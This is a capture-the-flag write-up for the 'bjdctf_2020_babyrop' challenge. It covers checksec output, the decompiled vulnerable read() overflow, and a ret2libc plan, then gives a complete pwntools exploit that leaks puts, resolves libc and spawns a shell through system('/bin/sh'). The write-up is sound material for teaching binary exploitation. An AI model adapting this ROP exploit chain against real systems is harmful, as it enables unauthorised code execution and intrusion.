bjdctf_2020_babyrop
Ubuntu 16
0x01
checksec
[*] '/home/zelas/Desktop/pwn/bjdctf_2020_babyrop/bjdctf_2020_babyrop'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found      // 无 canary，返回地址可以直接被覆盖
    NX:       NX enabled           // 栈不可执行，不能注入 shellcode，需要 ROP / ret2libc
    PIE:      No PIE (0x400000)    // 程序基址固定，gadget、plt、got 地址可以硬编码
IDA
vuln()
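/*
 * Target function as decompiled by IDA. It is reproduced unchanged: this is
 * the bug the exploit relies on, so it is documented here rather than fixed.
 *
 * buf holds 32 (0x20) bytes, but read() may write up to 0x64 (100) bytes into
 * it. The 68 excess bytes run over the saved rbp (8 bytes) and then the return
 * address, which is what the ROP chain overwrites. With no stack canary the
 * overwrite is not detected; with NX enabled the payload must be a ROP chain
 * rather than shellcode on the stack.
 *
 * Returns: the byte count reported by read(), or -1 on read error.
 */
ssize_t vuln()
{
    char buf[32];

    puts("Pull up your sword and tell me u story!");
    return read(0, buf, 0x64uLL);   /* stack overflow: 0x64 > sizeof(buf) */
}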
0x02
思路 ret2libc x64
1. 利用 read() 的栈溢出，把返回地址改为 `pop rdi; ret` -> puts@got -> puts@plt，泄露 puts() 在 libc 中的实际地址，然后返回 main() 以便再次触发溢出
2. 利用 LibcSearcher 根据泄露的 puts() 地址匹配 libc 版本，计算 libc 基址，进而得到 system() 和字符串 "/bin/sh" 的地址
3. 再次执行 main()，再次利用 read() 溢出，构造 `pop rdi; ret` -> "/bin/sh" -> system() 的链拿到 shell
s
0x20H
rbp
0x8
pop_rdi_ret
puts_got
ret
puts()
puts_ret
main()
s
0x20H
rbp
0x8
pop_rdi_ret
bin_sh
ret
system()
0x03
exp
LibcSearcher 匹配到的 libc 版本为 libc6_2.23-0ubuntu10_amd64（对应 Ubuntu 16.04）；如果匹配到多个候选，需要按照目标环境选择正确的一项，否则算出的 system()/"/bin/sh" 偏移是错的。
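from pwn import *
from LibcSearcher import *

context(os='linux', arch='amd64', log_level='debug')

BINARY = './bjdctf_2020_babyrop'

# vuln() reads up to 0x64 bytes into a 32-byte buffer: 0x20 bytes of buffer
# plus the 8-byte saved rbp sit between buf[0] and the return address.
PADDING = 0x20 + 0x8

# Gadget addresses are fixed because the binary is not PIE (base 0x400000).
# Re-check them (e.g. ROPgadget --binary ./bjdctf_2020_babyrop) if the binary
# is rebuilt; a stale gadget address silently breaks the chain.
POP_RDI_RET = 0x400733   # pop rdi ; ret
RET = 0x4004c9           # ret      (stack alignment, see stage 2 below)

# Printed by vuln() right before the vulnerable read(); used to sync I/O.
PROMPT = b'story!\n'

# Swap process() for remote(host, port) to run against a live target.
io = process([BINARY])
elf = ELF(BINARY)

puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main_addr = elf.symbols['main']

# Stage 1: leak puts@libc. Chain: pop rdi <- puts@got ; puts@plt ; main.
# puts(puts@got) prints the resolved libc address; returning into main()
# lets the overflow be triggered a second time for stage 2.
payload = (
    b'a' * PADDING
    + p64(POP_RDI_RET) + p64(puts_got)
    + p64(RET)
    + p64(puts_plt)
    + p64(main_addr)
)
io.sendlineafter(PROMPT, payload)

# A user-space address on x86-64 fits in 6 bytes; puts() prints them followed
# by '\n'. recvn() blocks until all 6 bytes arrived, unlike recv(6) which may
# return fewer bytes and then yield a garbage address.
puts_addr = u64(io.recvn(6).ljust(8, b'\x00'))
pause()   # convenient point to attach a debugger before the second stage
log.success(f'puts_addr = {puts_addr:#x}')

# LibcSearcher may offer several libcs for the same low 12 bits of puts();
# the correct one for this target is libc6_2.23-0ubuntu10_amd64. Picking a
# different one gives wrong offsets and a crash instead of a shell.
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
bin_sh = libc_base + libc.dump('str_bin_sh')
log.success(f'libc_base = {libc_base:#x}')
log.success(f'system    = {system_addr:#x}')
log.success(f'bin_sh    = {bin_sh:#x}')

# Stage 2: system("/bin/sh"). Chain: pop rdi <- "/bin/sh" ; ret ; system.
# The extra RET gadget re-aligns rsp to 16 bytes at system()'s entry: glibc
# 2.23 tolerates the misalignment, but glibc 2.27+ faults on a movaps in
# do_system() without it, so the chain works on both.
payload1 = (
    b'a' * PADDING
    + p64(POP_RDI_RET) + p64(bin_sh)
    + p64(RET)
    + p64(system_addr)
)
# main() ran again after stage 1 and prints the prompt once more; wait for it
# rather than blindly sending so the payload is not lost or mis-framed.
io.sendlineafter(PROMPT, payload1)
io.interactive()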